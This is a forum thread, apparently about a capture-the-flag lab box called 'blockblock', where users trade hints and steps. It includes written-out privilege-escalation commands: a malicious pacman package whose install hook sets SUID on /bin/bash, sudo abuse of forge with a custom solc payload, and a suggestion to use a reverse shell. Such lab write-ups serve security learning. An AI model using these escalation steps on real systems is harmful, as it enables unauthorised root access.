Posts: 116
Threads: 6
Joined: Mar 2024
(Nov 19, 2024, 06:29 PM)ritualist Wrote: (Nov 19, 2024, 06:26 PM)gfttjdb Wrote: (Nov 19, 2024, 06:01 PM)ritualist Wrote: For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step
cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p
I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload. not working bro
[keira@blockblock shm]$ sudo pacman -U *.zst --noconfirm
[sudo] password for keira:
Sorry, user keira is not allowed to execute '/usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst --noconfirm' as root on blockblock.
It's for paul -> root
See my previous post for getting from keira to paul.
stop helping them dude.. don't you see it, they can't do even a simple things... they're bunch of script kiddies.
Posts: 25
Threads: 0
Joined: Jul 2024
Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash ? or input ?. I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work ?, i've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing . Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?
Posts: 96
Threads: 2
Joined: Feb 2024
(Nov 19, 2024, 08:59 AM)test888 Wrote: (Nov 18, 2024, 03:58 PM)ritualist Wrote: To escalate to paul:
Init a new project
sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline
Put your payload in e.g. /dev/shm/solc
In `/dev/shm/exploit`, build with a custom solc
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc
Last step is using pacman.
Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.
Yes, as keira, and make it rx for everyone
Posts: 8
Threads: 1
Joined: Jan 2024
(Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash ? or input ?. I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work ?, i've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing . Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?
Because it's not an usual Input like the one as the 2nd contract, but the opcodes for EVM. I also stucked here for quite some time and it turns out even you decode all the opcodes for the outcome, we need to make some guess on the password. This should indeed an insane level for getting user
Posts: 96
Threads: 2
Joined: Feb 2024
(Nov 20, 2024, 08:29 AM)Axura Wrote: (Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash ? or input ?. I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work ?, i've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing . Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?
Because it's not an usual Input like the one as the 2nd contract, but the opcodes for EVM. I also stucked here for quite some time and it turns out even you decode all the opcodes for the outcome, we need to make some guess on the password. This should indeed an insane level for getting user
Just decode the blob from hex in Cyberchef and you will find the username and password at the end of the output
Posts: 28
Threads: 1
Joined: Dec 2023
i think i have a new hatred for blockchain stuff after this box  ob:
Posts: 16
Threads: 1
Joined: May 2024
(Nov 20, 2024, 04:27 PM)iiNovaCore Wrote: i think i have a new hatred for blockchain stuff after this box ob:
This is so true 
Posts: 25
Threads: 0
Joined: Jul 2024
(Nov 20, 2024, 08:48 AM)a44857437 Wrote: (Nov 20, 2024, 08:29 AM)Axura Wrote: (Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash ? or input ?. I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work ?, i've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing . Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?
Because it's not an usual Input like the one as the 2nd contract, but the opcodes for EVM. I also stucked here for quite some time and it turns out even you decode all the opcodes for the outcome, we need to make some guess on the password. This should indeed an insane level for getting user
Just decode the blob from hex in Cyberchef and you will find the username and password at the end of the output
Thank you very much, you unblocked me, I was already very stuck.
Posts: 22
Threads: 0
Joined: Oct 2024
This box is a whole new level of "why isnt this working"
Posts: 37
Threads: 1
Joined: Nov 2024
when trying to interact i keep getting Error: 401 {"error":"Prox
|
